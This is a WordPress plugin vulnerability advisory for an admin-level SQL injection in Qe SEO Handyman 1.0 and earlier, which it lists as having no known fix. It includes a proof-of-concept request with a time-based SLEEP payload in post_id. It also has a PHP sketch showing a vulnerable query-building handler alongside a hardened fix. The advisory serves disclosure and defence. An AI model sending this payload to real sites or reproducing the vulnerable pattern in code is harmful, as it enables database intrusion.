WordPress Plugin Vulnerabilities

Qe SEO Handyman <= 1.0 - Admin+ SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection that is exploitable by high-privilege users such as admin.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/admin.php?page=all-pages-meta
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 122
Origin: http://localhost
Connection: close
Cookie: [admin+]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=save_all_page_meta&parms=description&meta_description=test2&post_id=2+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)
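
The following PHP is an added illustration of the bug class described above and of its fix; it is not the plugin's actual code. It sketches a hypothetical admin-ajax handler for the `save_all_page_meta` action, using the `post_id` and `meta_description` parameter names from the proof of concept. The function names, the nonce action name and the meta key are assumptions.

```php
<?php
// Added illustration (not the plugin's own code): a hypothetical admin-ajax
// handler that stores a meta description for a post. Parameter names follow
// the advisory's PoC; function names, nonce name and meta key are assumptions.

// --- Vulnerable pattern: the request value is interpolated into the query. ---
function qsh_save_meta_vulnerable() {
    global $wpdb;
    $post_id = $_POST['post_id'];            // untrusted, used as-is
    $desc    = $_POST['meta_description'];   // untrusted, used as-is
    // Anything sent as post_id becomes part of the WHERE clause and is
    // parsed as SQL, which is exactly the condition the PoC relies on.
    $wpdb->query(
        "UPDATE {$wpdb->postmeta} SET meta_value = '$desc'
         WHERE meta_key = '_qsh_description' AND post_id = $post_id"
    );
    wp_send_json_success();
}

// --- Hardened pattern: authorise the caller, then never build SQL by hand. ---
function qsh_save_meta_fixed() {
    // 1. CSRF protection: 'qsh_save_meta' is an assumed nonce action name.
    check_ajax_referer( 'qsh_save_meta', 'nonce' );

    // 2. Authorisation: cast to an integer first, then check that the caller
    //    may edit this specific post (an admin-only handler still needs this).
    $post_id = absint( $_POST['post_id'] ?? 0 );
    if ( ! $post_id || ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Input handling: the meta API escapes values for us, so this
    //    operation needs no hand-written SQL at all.
    $desc = sanitize_text_field( wp_unslash( $_POST['meta_description'] ?? '' ) );
    update_post_meta( $post_id, '_qsh_description', $desc );

    // 4. Where raw SQL is unavoidable, $wpdb->prepare() binds the values with
    //    %s/%d placeholders, so an injected expression is stored as data,
    //    never executed as SQL:
    //    $wpdb->query( $wpdb->prepare(
    //        "UPDATE {$wpdb->postmeta} SET meta_value = %s
    //         WHERE meta_key = %s AND post_id = %d",
    //        $desc, '_qsh_description', $post_id
    //    ) );

    wp_send_json_success();
}
add_action( 'wp_ajax_save_all_page_meta', 'qsh_save_meta_fixed' );
```

The fix is three layers rather than one: a nonce check stops cross-site requests from reaching the handler, a capability check scoped to the post limits who may change it, and using `update_post_meta()` (or `$wpdb->prepare()` with typed placeholders) removes string concatenation from the data path entirely, which is the defect the advisory describes. An `absint()` cast alone would close this particular injection, but the parameterised form also protects any future string parameters added to the same query.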

Affects Plugins

No known fix

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
Daniel Krohmer, Kunal Sharma
Submitter
Daniel Krohmer
Verified
Yes

Timeline

Publicly Published
2022-12-08 (about 1 year ago)
Added
2022-12-08 (about 1 year ago)
Last Updated
2022-12-08 (about 1 year ago)